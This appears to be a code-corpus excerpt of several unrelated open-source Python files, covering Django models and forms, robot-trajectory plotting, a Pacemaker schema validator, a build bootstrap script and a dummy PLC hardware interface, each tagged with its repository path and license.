logger.info('Adding \'%s\' ConfigListItem [%s, %s, %s, %s]' %
(list.url, character, kart, wheel, glider))
return cls(list=list, character=character, kart=kart, wheel=wheel, glider=glider)
class Meta:
unique_together = ("list", "character", "kart", "wheel", "glider")
class KartRecord(models.Model):
"""A record of each anonymous kart configuration generated by users."""
character = models.ForeignKey(Character)
kart = models.ForeignKey(Kart)
wheel = models.ForeignKey(Wheel)
glider = models.ForeignKey(Glider)
create_ip = models.GenericIPAddressField(default='0.0.0.0')
create_date = models.DateTimeField(auto_now_add=True)
| dougwt/kartographer | kartographer/comparison/models.py | Python | gpl-2.0 | 8,723 |
from math import exp
import matplotlib
import matplotlib.pyplot as plt
from PIL import Image
import pickle
matplotlib.rcParams['ps.useafm'] = True
matplotlib.rcParams['pdf.use14corefonts'] = True
matplotlib.rcParams['text.usetex'] = True
def draw_map(img_dir):
im = Image.open(img_dir)
pix = im.load()
Nx = im.size[0]
Ny = im.size[1]
scale = 0.02
# print im.size
# x = 100
# y= 100
# print pix[x,y] #Get the RGBA Value of the a pixel of an image
# print pix[0,0]
# (1000, 450)
# (255, 255, 255)
# (0, 0, 0)
fig = plt.figure()
ax = fig.add_subplot(111)
for nx in range(0, Nx, 5)+[Nx-1]:
for ny in range(0, Ny, 5)+[Ny-1]:
if pix[nx,ny][0] == 0:
ax.plot(nx*scale, (Ny-ny)*scale, color='k',
marker='s', markersize=1)
ax.set_xlim([0,(Nx-1)*scale])
plt.axis('off')
plt.axis('equal')
fig.tight_layout(pad=0)
fig.savefig('map.pdf',bbox_inches='tight', pad_inches=0)
return fig
def plot_traj(img_dir, A_robot_pose, A_control):
robot_x = []
robot_y = []
hi_c = []
sample = 5
L = range(len(A_robot_pose)-1)
for k in L[0::sample]:
robot_pose = A_robot_pose[k]
robot_x.append(robot_pose[1][0])
robot_y.append(robot_pose[1][1])
h_control = A_control[k][0]
if (abs(h_control[0])+abs(h_control[1]))>0.1:
hi_c.append(1)
else:
hi_c.append(0)
im = Image.open(img_dir)
pix = im.load()
Nx = im.size[0]
Ny = im.size[1]
scale = 0.02
Ns = 2
# plot map
fig = plt.figure()
ax1 = fig.add_subplot(121)
for nx in range(0, Nx, Ns)+[Nx-1]:
for ny in range(0, Ny, Ns)+[Ny-1]:
if pix[nx,ny][0] == 0:
ax1.plot(nx*scale, (Ny-ny)*scale, color='k',
marker='s', markersize=1)
# plot pre hi
print 'traj length', len(robot_x)
k1 = [0, 180/sample] # initial
k2 = [180/sample, 240/sample] #hi
k3 = [240/sample,1110/sample] # normal
k4 = [1100/sample, 1200/sample] #hi
k5 = [1200/sample, 2100/sample] #update
k6 = [2100/sample, 2450/sample] #temp
ax1.plot(robot_x[k1[0]:k1[1]], robot_y[k1[0]:k1[1]], color='b',
linestyle='-',linewidth=2, marker='o', mfc='grey',
fillstyle='full', markersize=2.3, zorder=2)
ax1.plot(robot_x[k2[0]:k2[1]], robot_y[k2[0]:k2[1]], color='r',
linestyle='-',linewidth=2, marker='o', mfc='grey',
fillstyle='full', markersize=2.3, zorder=7, label=r'HIL')
ax1.plot(robot_x[k3[0]:k3[1]], robot_y[k3[0]:k3[1]], color='b',
linestyle='-',linewidth=2, marker='o', mfc='grey',
fillstyle='full', markersize=2.3, zorder=5, label=r'$\tau_r^0$')
#---------- print regions of interest
ap = ['r_0', 'r_1', 'r_2',
'r_3', 'r_4', 'r_5',
'r_6', 'r_7', 'r_8',
'c_1', 'c_2', 'c_3',
'c_4']
roi = [(2.5, 1.5, 0.5), (8.5, 0.5, 0.5), (12.5, 1.5, 0.5),
(17.5, 1.5, 0.5), (8.5, 4.5, 0.5), (14.5, 4.5, 0.5),
(18.5, 4.5, 0.5), (3.0, 8.0, 0.7), (11.5, 8.5, 0.5),
(2.0, 6.0, 1.0), (11.0, 4.0, 1.0), (17.0, 4.0, 0.7),
(8.0, 7.0, 1.0),
]
for k in range(len(roi)):
reg = roi[k]
rec = matplotlib.patches.Rectangle((reg[0]-reg[2], reg[1]-reg[2]), reg[2]*2, reg[2]*2, fill = True, facecolor = 'cyan', edgecolor = 'black', linewidth = 1, alpha =0.8)
ax1.add_patch(rec)
ax1.text(reg[0], reg[1]-0.1, r'$%s$' %ap[k], fontsize = 20, fontweight = 'bold', zorder = 3)
ax1.legend(ncol=1,bbox_to_anchor=(0.78,0.56),loc='lower left', borderpad=0.1, labelspacing=0.2, columnspacing= 0.3, numpoints=3, prop={'size': 10})
ax1.grid()
ax1.set_xlim([0,(Nx-1)*scale])
ax1.axis('off')
ax1.axis('equal')
#==============================
ax2 = fig.add_subplot(122)
for nx in range(0, Nx, Ns)+[Nx-1]:
for ny in range(0, Ny, Ns)+[Ny-1]:
if pix[nx,ny][0] == 0:
ax2.plot(nx*scale, (Ny-ny)*scale, color='k',
marker='s', markersize=1)
# plot pre hi
print 'traj length', len(robot_x)
k1 = [0, 100/sample] # initial
k2 = [100/sample, 250/sample] #hi
k3 = [250/sample,1110/sample] # normal
k4 = [1100/sample, 1200/sample] #hi
k5 = [1200/sample, 2110/sample] #update
k6 = [2100/sample, 2390/sample] #temp
ax2.plot(robot_x[k4[0]:k4[1]], robot_y[k4[0]:k4[1]], color='r',
linestyle='-',linewidth=2, marker='o', mfc='grey',
fillstyle='full', markersize=2.3, zorder=6, label=r'HIL')
ax2.plot(robot_x[k5[0]:k5[1]], robot_y[k5[0]:k5[1]], color='g',
linestyle='-',linewidth=2, marker='o', mfc='grey',
fillstyle='full', markersize=2.3, zorder=5, label=r'$\tau_r^t$')
ax2.plot(robot_x[k6[0]:k6[1]], robot_y[k6[0]:k6[1]], color='m',
linestyle='-',linewidth=2, marker='o', mfc='grey',
fillstyle='full', markersize=2.3, zorder=7, label=r'$\varphi_{\textup{temp}}$')
ax2.plot(robot_x[(k6[1]-10):], robot_y[(k6[1]-10):], color='g',
linestyle='-',linewidth=2, marker='o', mfc='grey',
fillstyle='full', markersize=2.3, zorder=5)
#---------- print regions of interest
ap = ['r_0', 'r_1', 'r_2',
'r_3', 'r_4', 'r_5',
'r_6', 'r_7', 'r_8',
'c_1', 'c_2', 'c_3',
'c_4']
roi = [(2.5, 1.5, 0.5), (8.5, 0.5, 0.5), (12.5, 1.5, 0.5),
(17.5, 1.5, 0.5), (8.5, 4.5, 0.5), (14.5, 4.5, 0.5),
(18.5, 4.5, 0.5), (3.0, 8.0, 0.7), (11.5, 8.5, 0.5),
(2.0, 6.0, 1.0), (11.0, 4.0, 1.0), (17.0, 4.0, 0.7),
(8.0, 7.0, 1.0),
]
for k in range(len(roi)):
reg = roi[k]
rec = matplotlib.patches.Rectangle((reg[0]-reg[2], reg[1]-reg[2]), reg[2]*2, reg[2]*2, fill = True, facecolor = 'cyan', edgecolor = 'black', linewidth = 1, alpha =0.8)
ax2.add_patch(rec)
ax2.text(reg[0], reg[1]-0.1, r'$%s$' %ap[k], fontsize = 20, fontweight = 'bold', zorder = 3)
ax2.legend(ncol=1,bbox_to_anchor=(0.78,0.56),loc='lower left', borderpad=0.1, labelspacing=0.1, columnspacing= 0.1, numpoints=3, prop={'size': 7.8})
ax2.grid()
ax2.set_xlim([0,(Nx-1)*scale])
ax2.axis('off')
ax2.axis('equal')
fig.tight_layout(pad=0)
fig.savefig('traj_sim_2_zoom.pdf',bbox_inches='tight', pad_inches=0)
def plot_control(A_control):
c_linear = []
c_angular = []
h_linear = []
h_angular = []
m_linear = []
m_angular = []
for control in A_control:
[tele_control, navi_control, mix_control] = control
c_linear.append(navi_control[0])
c_angular.append(navi_control[1])
h_linear.append(tele_control[0])
h_angular.append(tele_control[1])
m_linear.append(mix_control[0])
m_angular.append(mix_control[1])
#------------------------------ plot v
step = 1.0
T = [t*step for t in range(len(A_control))]
fig = plt.figure(figsize=(10,3))
ax = fig.add_subplot(111)
ax.plot(T, c_linear, linestyle='--',
linewidth=2.0,
color='blue',label=r'$u_r[v]$',zorder = 3)
ax.plot(T, h_linear, linestyle='--',
linewidth=2.0,
color='red',label=r'$u_h[v]$',zorder = 4)
ax.plot(T, m_linear, linestyle='-',
linewidth=2.0,
color='black',label=r'$u[v]$',zorder = 2)
ax.legend(ncol=3,loc='upper left',borderpad=0.1, labelspacing=0.2, columnspacing= 0.5)
ax.grid()
ax.set_xlabel(r'$t(s)$')
ax.set_ylabel(r'$v(m/s)$')
ax.set_xlim(0, step*(len(A_control)))
ax.set_ylim(-0.5, 1.1)
#-------------------- plot w
# step = 1.0
# T = [t*step for t in range(len(A_control))]
# fig = plt.figure(figsize=(10,3))
# ax = fig.add_subplot(111)
# ax.plot(T, c_angular, linestyle='--',
# linewidth=2.0,
# color='blue',label=r'$u_r[\omega]$',zorder = 3)
# ax.plot(T, h_angular, linestyle='--',
# linewidth=2.0,
# color='red',label=r'$u_h[\omega]$',zorder = 4)
# ax.plot(T, m_angular, linestyle='-',
# linewidth=2.0,
# color='black',label=r'$u[\omega]$',zorder = 2)
# ax.legend(ncol=3,loc='upper left',borderpad=0.1, labelspacing=0.2, columnspacing= 0.5)
# ax.grid()
# ax.set_xlabel(r'$t(s)$')
# ax.set_ylabel(r'$\omega(rad/s)$')
# ax.set_xlim(0, step*(len(A_control)))
# ax.set_ylim(-1.1, 1.5)
#------------------------------ zoom in v
# step = 1.0
# T = [t*step for t in range(len(A_control))]
# k1 = 710
# k2 = 910
# k3 = 1200
# k4 = 1400
# fig = plt.figure(figsize=(10,3))
# ax1 = fig.add_subplot(121)
# ax1.plot(T[k1:k2], c_linear[k1:k2], linestyle='--',
# linewidth=2.0,
# color='blue',label=r'$u_r[v]$',zorder = 3)
# ax1.plot(T[k1:k2], h_linear[k1:k2], linestyle='--',
# linewidth=2.0,
# color='red',label=r'$u_h[v]$',zorder = 4)
# ax1.plot(T[k1:k2], m_linear[k1:k2], linestyle='-',
# linewidth=2.0,
# color='black',label=r'$u[v]$',zorder = 2)
# ax1.legend(ncol=3,loc='upper left',borderpad=0.1, labelspacing=0.2, columnspacing= 0.5)
# ax1.grid()
# ax1.set_xlabel(r'$t(s)$')
# ax1.set_ylabel(r'$v(m/s)$')
# ax1.set_xlim(k1*step, k2*step)
# ax1.set_ylim(-0.5, 1.1)
# ax2 = fig.add_subplot(122)
# ax2.plot(T[k3:k4], c_linear[k3:k4], linestyle='--',
# linewidth=2.0,
# color='blue',label=r'$u_r[v]$',zorder = 3)
# ax2.plot(T[k3:k4], h_linear[k3:k4], linestyle='--',
# linewidth=2.0,
# color='red',label=r'$u_h[v]$',zorder = 4)
# ax2.plot(T[k3:k4], m_linear[k3:k4], linestyle='-',
# linewidth=2.0,
# color='black',label=r'$u[v]$',zorder = 2)
# ax2.legend(ncol=3,loc='upper left',borderpad=0.1, labelspacing=0.2, columnspacing= 0.5)
# ax2.grid()
# ax2.set_xlabel(r'$t(s)$')
# ax2.set_ylabel(r'$v(m/s)$')
# ax2.set_xlim(k3*step, k4*step)
# ax2.set_ylim(-0.5, 1.1)
# ------------------------------ zoom in w
# step = 1.0
# T = [t*step for t in range(len(A_control))]
# k1 = 710
# k2 = 910
# k3 = 1200
# k4 = 1400
# fig = plt.figure(figsize=(10,3))
# ax1 = fig.add_subplot(121)
# ax1.plot(T[k1:k2], c_angular[k1:k2], linestyle='--',
# linewidth=2.0,
# color='blue',label=r'$u_r[\omega]$',zorder = 3)
# ax1.plot(T[k1:k2], h_angular[k1:k2], linestyle='--',
# linewidth=2.0,
# color='red',label=r'$u_h[\omega]$',zorder = 4)
# ax1.plot(T[k1:k2], m_angular[k1:k2], linestyle='-',
# linewidth=2.0,
# color='black',label=r'$u[\omega]$',zorder = 2)
# ax1.legend(ncol=3,loc='upper left',borderpad=0.1, labelspacing=0.2, columnspacing= 0.5)
# ax1.grid()
# ax1.set_xlabel(r'$t(s)$')
# ax1.set_ylabel(r'$\omega(rad/s)$')
# ax1.set_xlim(k1*step, k2*step)
# ax1.set_ylim(-1.1, 1.5)
# ax2 = fig.add_subplot(122)
# ax2.plot(T[k3:k4], c_angular[k3:k4], linestyle='--',
# linewidth=2.0,
# color='blue',label=r'$u_r[\omega]$',zorder = 3)
# ax2.plot(T[k3:k4], h_angular[k3:k4], linestyle='--',
# linewidth=2.0,
# color='red',label=r'$u_h[\omega]$',zorder = 4)
# ax2.plot(T[k3:k4], m_angular[k3:k4], linestyle='-',
# linewidth=2.0,
# color='black',label=r'$u[\omega]$',zorder = 2)
# ax2.legend(ncol=3,loc='upper left',borderpad=0.1, labelspacing=0.2, columnspacing= 0.5)
# ax2.grid()
# ax2.set_xlabel(r'$t(s)$')
# ax2.set_ylabel(r'$\omega(rad/s)$')
# ax2.set_xlim(k3*step, k4*step)
# ax2.set_ylim(-1.1, 1.5)
plt.savefig(r'sim_control_v_2.pdf', bbox_inches = 'tight')
def plot_beta(A_beta):
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(111)
ax.plot(range(len(A_beta)), A_beta, color='b',
linestyle='-', linewidth=5, marker='o', mfc='r',
fillstyle='full', markersize=6, zorder=2)
ax.set_xlabel(r'$Iteration$')
ax.set_ylabel(r'$\beta_k$')
ax.set_xlim(0, len(A_beta))
ax.set_ylim(0, 12)
ax.grid()
plt.savefig(r'sim_beta_2.pdf', bbox_inches = 'tight')
if __name__ == "__main__":
A_robot_pose, A_control, A_beta = pickle.load(open('tiago_sim_case_two.p', 'rb'))
# draw_map('map.png')
plot_traj('map.png', A_robot_pose, A_control)
# plot_control(A_control)
# plot_beta(A_beta[0])
# print A_beta[0]
| MengGuo/mix_initiative | utilities/map/vis_sim.py | Python | gpl-2.0 | 12,697 |
from django.contrib.auth.forms import AuthenticationForm
from django.core.urlresolvers import reverse
from actstream.models import user_stream
from dnstorm.app import DNSTORM_URL
from dnstorm.app.utils import get_option
from dnstorm.app.models import Problem, Idea
from dnstorm.app.utils import get_option
def base(request):
"""
Provides basic variables used for all templates.
"""
context = dict()
context['dnstorm_url'] = DNSTORM_URL
# Links
if not context.get('site_title', None):
context['site_title'] = '%s | %s' % (
get_option('site_title'), get_option('site_description'))
context['site_url'] = get_option('site_url')
context['login_form'] = AuthenticationForm()
context['login_url'] = reverse('login') + '?next=' + request.build_absolute_uri() if 'next' not in request.GET else ''
context['logout_url'] = reverse('logout') + '?next=' + request.build_absolute_uri() if 'next' not in request.GET else ''
# Checks
context['is_update'] = 'update' in request.resolver_match.url_name
# Activity
context['user_activity'] = user_stream(request.user, with_user_activity=True) if request.user.is_authenticated() else None
context['user_activity_counter'] = get_option('user_%d_activity_counter' % request.user.id) if request.user.is_authenticated() else None
return context
| vmassuchetto/dnstorm | dnstorm/app/context_processors.py | Python | gpl-2.0 | 1,367 |
# Copyright (C) 2009 Yan Gao <ygao@novell.com>
# See COPYING for license information.
import os
import tempfile
import copy
from lxml import etree
class PacemakerError(Exception):
'''PacemakerError exceptions'''
def get_validate_name(cib_elem):
if cib_elem is not None:
return cib_elem.get("validate-with")
else:
return None
def get_validate_type(cib_elem):
return "rng"
def get_schema_filename(validate_name):
if not validate_name.endswith('.rng'):
return "%s.rng" % (validate_name)
return validate_name
def read_schema_local(validate_name, file_path):
try:
with open(file_path) as f:
return f.read()
except IOError, msg:
raise PacemakerError("Cannot read schema file '%s': %s" % (file_path, msg))
def delete_dir(dir_path):
real_path = os.path.realpath(dir_path)
if real_path.count(os.sep) == len(real_path):
raise PacemakerError("Do not delete the root directory")
for root, dirs, files in os.walk(dir_path, False):
for name in files:
try:
os.unlink(os.path.join(root, name))
except OSError:
continue
for name in dirs:
try:
os.rmdir(os.path.join(root, name))
except OSError:
continue
os.rmdir(dir_path)
def subset_select(sub_set, optional):
"Helper used to select attributes/elements based on subset and optional flag"
if sub_set == 'r': # required
return not optional
if sub_set == 'o': # optional
return optional
return True
def CrmSchema(cib_elem, local_dir):
return RngSchema(cib_elem, local_dir)
class Schema(object):
validate_name = None
def __init__(self, cib_elem, local_dir, is_local=True, get_schema_fn=None):
self.is_local = is_local
if get_schema_fn is not None:
self.get_schema_fn = get_schema_fn
else:
self.get_schema_fn = read_schema_local
self.local_dir = local_dir
self.refresh(cib_elem)
self.schema_str_docs = {}
self.schema_filename = None
def update_schema(self):
'defined in subclasses'
raise NotImplementedError
def find_elem(self, elem_name):
'defined in subclasses'
raise NotImplementedError
def refresh(self, cib_elem):
saved_validate_name = self.validate_name
self.validate_name = get_validate_name(cib_elem)
self.schema_filename = get_schema_filename(self.validate_name)
if self.validate_name != saved_validate_name:
return self.update_schema()
def validate_cib(self, new_cib_elem):
detail_msg = ""
if self.is_local:
schema_f = os.path.join(self.local_dir, self.schema_filename)
else:
try:
tmp_f = self.tmp_schema_f()
except EnvironmentError, msg:
raise PacemakerError("Cannot expand the Relax-NG schema: " + str(msg))
if tmp_f is None:
raise PacemakerError("Cannot expand the Relax-NG schema")
else:
schema_f = tmp_f
try:
cib_elem = etree.fromstring(etree.tostring(new_cib_elem))
except etree.Error, msg:
raise PacemakerError("Failed to parse the CIB XML: " + str(msg))
try:
schema = etree.RelaxNG(file=schema_f)
except etree.Error, msg:
raise PacemakerError("Failed to parse the Relax-NG schema: " + str(msg))
#try:
# schema.assertValid(cib_elem)
#except etree.DocumentInvalid, err_msg:
# print err_msg
# print schema.error_log
try:
etree.clear_error_log()
except:
pass
is_valid = schema.validate(cib_elem)
if not is_valid:
for error_entry in schema.error_log:
detail_msg += error_entry.level_name + ": " + error_entry.message + "\n"
if not self.is_local:
try:
delete_dir(os.path.dirname(tmp_f))
except:
pass
return (is_valid, detail_msg)
def tmp_schema_f(self):
tmp_dir = tempfile.mkdtemp()
for schema_doc_name in self.schema_str_docs:
schema_doc_filename = os.path.join(tmp_dir, schema_doc_name)
fd = os.open(schema_doc_filename, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0644)
schema_doc_str = self.schema_str_docs[schema_doc_name]
os.write(fd, schema_doc_str)
os.close(fd)
if self.schema_filename in self.schema_str_docs:
return os.path.join(tmp_dir, self.schema_filename)
else:
return None
def get_sub_elems_by_obj(self, obj, sub_set='a'):
'''defined in subclasses'''
raise NotImplementedError
def get_elem_attrs_by_obj(self, obj, sub_set='a'):
'''defined in subclasses'''
raise NotImplementedError
# sub_set: 'a'(all), 'r'(required), 'o'(optional)
def get_elem_attrs(self, elem_name, sub_set='a'):
elem_obj = self.find_elem(elem_name)
if elem_obj is None:
return None
return self.get_elem_attrs_by_obj(elem_obj, sub_set)
# sub_set: 'a'(all), 'r'(required), 'o'(optional)
def get_sub_elems(self, elem_name, sub_set='a'):
elem_obj = self.find_elem(elem_name)
if elem_obj is None:
return None
return self.get_sub_elems_by_obj(elem_obj, sub_set)
def supported_rsc_types(self):
return self.get_sub_elems("resources")
def get_local_tag(el):
return el.tag.replace("{%s}" % el.nsmap[None], "")
class RngSchema(Schema):
expr = '//*[local-name() = $name]'
def __init__(self, cib_elem, local_dir, is_local=True, get_schema_fn=None):
self.rng_docs = {}
Schema.__init__(self, cib_elem, local_dir, is_local=is_local, get_schema_fn=get_schema_fn)
def update_schema(self):
self.rng_docs = {}
self.schema_str_docs = {}
self.update_rng_docs(self.validate_name, self.schema_filename)
return True
def update_rng_docs(self, validate_name="", file=""):
self.rng_docs[file] = self.find_start_rng_node(validate_name, file)
if self.rng_docs[file] is None:
return
for extern_ref in self.rng_docs[file][0].xpath(self.expr, name="externalRef"):
href_value = extern_ref.get("href")
if self.rng_docs.get(href_value) is None:
self.update_rng_docs(validate_name, href_value)
def find_start_rng_node(self, validate_name="", file=""):
schema_info = validate_name + " " + file
crm_schema = self.get_schema_fn(validate_name,
os.path.join(self.local_dir, file))
if not crm_schema:
raise PacemakerError("Cannot get the Relax-NG schema: " + schema_info)
self.schema_str_docs[file] = crm_schema
try:
grammar = etree.fromstring(crm_schema)
except Exception, msg:
raise PacemakerError("Failed to parse the Relax-NG schema: " + str(msg) + schema_info)
start_nodes = grammar.xpath(self.expr, name="start")
if len(start_nodes) > 0:
start_node = start_nodes[0]
return (grammar, start_node)
else:
raise PacemakerError("Cannot find the start in the Relax-NG schema: " + schema_info)
def find_in_grammar(self, grammar, node, name):
for elem_node in grammar.xpath(self.expr, name=node):
if elem_node.get("name") == name:
return elem_node
return None
def find_elem(self, elem_name):
elem_node = None
for (grammar, start_node) in self.rng_docs.values():
elem_node = self.find_in_grammar(grammar, 'element', elem_name)
if elem_node is not None:
return (grammar, elem_node)
return None
def rng_xpath(self, xpath, namespaces=None):
return [grammar.xpath(xpath, namespaces=namespaces)
for grammar, _ in self.rng_docs.values()]
def get_sub_rng_nodes(self, grammar, rng_node):
sub_rng_nodes = []
for child_node in rng_node.iterchildren():
if not isinstance(child_node.tag, basestring):
continue
local_tag = get_local_tag(child_node)
if local_tag == "ref":
def_node = self.find_in_grammar(grammar, 'define', child_node.get('name'))
if def_node is not None:
sub_rng_nodes.extend(self.get_sub_rng_nodes(grammar, def_node))
elif local_tag == "externalRef":
nodes = self.get_sub_rng_nodes(*self.rng_docs[child_node.get("href")])
sub_rng_nodes.extend(nodes)
elif local_tag in ["element", "attribute", "value", "data", "text"]:
sub_rng_nodes.append([(grammar, child_node)])
elif local_tag in ["interleave", "optional", "zeroOrMore",
"choice", "group", "oneOrMore"]:
nodes = self.get_sub_rng_nodes(grammar, child_node)
for node in nodes:
node.append(copy.deepcopy(child_node))
sub_rng_nodes.extend(nodes)
return sub_rng_nodes
def sorted_sub_rng_nodes_by_name(self, obj_type):
rng_node = self.find_elem(obj_type)
if rng_node is None or rng_node[1] is None:
return None
return self.sorted_sub_rng_nodes_by_node(*rng_node)
def sorted_sub_rng_nodes_by_node(self, grammar, rng_node):
sub_rng_nodes = self.get_sub_rng_nodes(grammar, rng_node)
sorted_nodes = {}
for sub_rng_node in sub_rng_nodes:
name = get_local_tag(sub_rng_node[0][1])
if sorted_nodes.get(name) is None:
sorted_nodes[name] = []
sorted_nodes[name].append(sub_rng_node)
return sorted_nodes
def get_elem_attr_objs(self, obj_type):
return self.sorted_sub_rng_nodes_by_name(obj_type).get("attribute", [])
def get_sub_elem_objs(self, obj_type):
return self.sorted_sub_rng_nodes_by_name(obj_type).get("element", [])
def find_decl(self, rng_node, name, first=True):
decl_node_index = 0
for decl_node in rng_node[1:]:
if get_local_tag(decl_node) == name:
decl_node_index = rng_node.index(decl_node) - len(rng_node)
if first:
break
return decl_node_index
def get_sorted_decl_nodes(self, decl_nodes_list, decl_type):
sorted_nodes = []
for rng_nodes in decl_nodes_list:
rng_node = rng_nodes.get(decl_type)
if rng_node is not None and rng_node not in sorted_nodes:
sorted_nodes.append(rng_node)
return sorted_nodes
def get_obj_name(self, rng_node):
return rng_node[0][1].get("name")
def get_attr_type(self, attr_rng_node):
sub_rng_nodes = self.sorted_sub_rng_nodes_by_node(*attr_rng_node[0])
for sub_rng_node in sub_rng_nodes.get("data", []):
return sub_rng_nodes["data"][0][0][1].get("type")
return None
def get_attr_values(self, attr_rng_node):
attr_values = []
sub_rng_nodes = self.sorted_sub_rng_nodes_by_node(*attr_rng_node[0])
for sub_rng_node in sub_rng_nodes.get("value", []):
#print etree.tostring(sub_rng_node[0][1])
#print sub_rng_node[0][1].text
#attr_values.append(sub_rng_node[0][1].getchildren()[0].data)
attr_values.append(sub_rng_node[0][1].text)
return attr_values
def get_attr_default(self, attr_rng_node):
return attr_rng_node[0][1].get("ann:defaultValue")
def _get_by_obj(self, rng_obj, typ, sub_set):
"""
Used to select attributes or elements based on
sub_set selector and optionality.
typ: 'attribute' or 'element'
sub_set: 'a'(all), 'r'(required), 'o'(optional)
"""
grammar, rng_node = rng_obj
if rng_node is None:
return None
selected = []
sub_rng_nodes = self.get_sub_rng_nodes(grammar, rng_node)
for node in sub_rng_nodes:
head = node[0][1]
if get_local_tag(head) != typ:
continue
name = head.get("name")
if selected.count(name):
continue
# the complicated case: 'choice'
#if self.find_decl(sub_rng_node, "choice") != 0:
optional = any(self.find_decl(node, opt) != 0
for opt in ("optional", "zeroOrMore"))
if subset_select(sub_set, optional):
selected.append(name)
return selected
def get_elem_attrs_by_obj(self, rng_obj, sub_set='a'):
"sub_set: 'a'(all), 'r'(required), 'o'(optional)"
return self._get_by_obj(rng_obj, 'attribute', sub_set=sub_set)
def get_sub_elems_by_obj(self, rng_obj, sub_set='a'):
"sub_set: 'a'(all), 'r'(required), 'o'(optional)"
return self._get_by_obj(rng_obj, 'element', sub_set=sub_set)
| aspiers/crmsh | modules/pacemaker.py | Python | gpl-2.0 | 13,248 |
import sys
import click
import os
import subprocess
from packageinfo import BUILD, VERSION, NAME
if "WM_PROJECT" not in os.environ:
print("To run this command you must source edmenv.sh first")
sys.exit(1)
# The version of the buildcommon to checkout.
BUILDCOMMONS_VERSION="v0.1"
def bootstrap_devenv():
try:
os.makedirs(".devenv")
except OSError:
pass
if not os.path.exists(".devenv/buildrecipes-common"):
subprocess.check_call([
"git", "clone", "-b", BUILDCOMMONS_VERSION,
"http://github.com/simphony/buildrecipes-common.git",
".devenv/buildrecipes-common"
])
sys.path.insert(0, ".devenv/buildrecipes-common")
bootstrap_devenv()
import buildcommons as common # noqa
workspace = common.workspace()
common.edmenv_setup()
@click.group()
def cli():
pass
@cli.command()
def egg():
common.local_repo_to_edm_egg(".", name=NAME, version=VERSION, build=BUILD)
with common.cd("openfoam-interface/internal-interface/wrapper"):
common.run("python edmsetup.py egg")
@cli.command()
def upload_egg():
egg_path = "endist/{NAME}-{VERSION}-{BUILD}.egg".format(
NAME=NAME,
VERSION=VERSION,
BUILD=BUILD)
click.echo("Uploading {} to EDM repo".format(egg_path))
common.upload_egg(egg_path)
with common.cd("openfoam-interface/internal-interface/wrapper"):
try:
common.run("python edmsetup.py upload_egg")
except subprocess.CalledProcessError as e:
print("Error during egg upload of submodule: {}. Continuing.".format(e))
click.echo("Done")
@cli.command()
def clean():
click.echo("Cleaning")
common.clean(["endist", ".devenv"])
cli()
| simphony/simphony-openfoam | edmsetup.py | Python | gpl-2.0 | 1,743 |
def hello_again():
print("hello again")
| pdorrell/emacs-site-lisp | test/test-project/src/subdir_with_files/spaced dir name/hello.py | Python | gpl-2.0 | 45 |
"""
accounts
FILE: forms.py
Created: 6/21/15 8:31 PM
"""
__author__ = 'Mark Scrimshire:@ekivemark'
from django.conf import settings
from django import forms
from django.utils.safestring import mark_safe
from registration.forms import (RegistrationFormUniqueEmail,
RegistrationFormTermsOfService)
from accounts.models import User
class Email(forms.EmailField):
def clean(self, value):
if settings.DEBUG:
print("email is ", value)
value = value.lower()
super(Email, self).clean(value)
try:
User.objects.get(email=value)
raise forms.ValidationError(mark_safe(
"This email is already registered. <br/>Use <a href='/password/reset'>this forgot password</a> link or on the <a href ='/accounts/login?next=/'>login page</a>."))
except User.DoesNotExist:
if settings.DEBUG:
print("no match on user:", value)
return value
class UserRegistrationForm(forms.ModelForm):
"""
A form for creating new users. Includes all the required
fields, plus a repeated password.
"""
# email will be become username
email = Email()
password1 = forms.CharField(widget=forms.PasswordInput(),
label="Password")
password2 = forms.CharField(widget=forms.PasswordInput(),
label="Repeat your password")
fields = ['user', 'email', 'password1', 'password2' ]
def clean_user(self):
"""
We need to check that user is not containing spaces.
We also need to make sure it is lower case
:return: self
"""
data = self.cleaned_data['user']
# remove spaces
data = data.replace(" ", "")
# Convert to lowercase
data = data.lower()
if data == "":
raise forms.ValidationError("User name is required")
if settings.DEBUG:
print("User: ", self.cleaned_data['user'], " = [",data, "]" )
return data
def clean_password(self):
if self.data['password1'] != self.data['password2']:
raise forms.ValidationError('Passwords are not the same')
return self.data['password1']
class RegistrationFormUserTOSAndEmail(UserRegistrationForm,
RegistrationFormUniqueEmail,
RegistrationFormTermsOfService,
):
class Meta:
model = User
fields = ['user',
'email',
'first_name',
'last_name']
# exclude = ['user']
# pass
class RegistrationFormTOSAndEmail(
RegistrationFormUniqueEmail,
RegistrationFormTermsOfService,
):
pass
| ekivemark/bofhirdev | accounts/forms/other.py | Python | gpl-2.0 | 2,816 |
# -*- coding: utf-8 -*-
#
# AWL simulator - Dummy hardware interface
#
# Copyright 2013-2014 Michael Buesch <m@bues.ch>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from __future__ import division, absolute_import, print_function, unicode_literals
from awlsim.common.compat import *
from awlsim.core.hardware import *
from awlsim.core.operators import AwlOperator
from awlsim.core.datatypes import AwlOffset
class HardwareInterface(AbstractHardwareInterface):
name = "dummy"
def __init__(self, sim, parameters={}):
AbstractHardwareInterface.__init__(self,
sim = sim,
parameters = parameters)
def doStartup(self):
pass # Do nothing
def doShutdown(self):
pass # Do nothing
def readInputs(self):
pass # Do nothing
def writeOutputs(self):
pass # Do nothing
def directReadInput(self, accessWidth, accessOffset):
if accessOffset < self.inputAddressBase:
return None
# Just read the current value from the CPU and return it.
return self.sim.cpu.fetch(AwlOperator(AwlOperator.MEM_E,
accessWidth,
AwlOffset(accessOffset)))
def directWriteOutput(self, accessWidth, accessOffset, data):
if accessOffset < self.outputAddressBase:
return False
# Just pretend we wrote it somewhere.
return True
| gion86/awlsim | awlsimhw_dummy/main.py | Python | gpl-2.0 | 1,933 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# ------------------------------------------------------------------------------
# Copyright (C) 2006-2016 University of Dundee. All rights reserved.
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
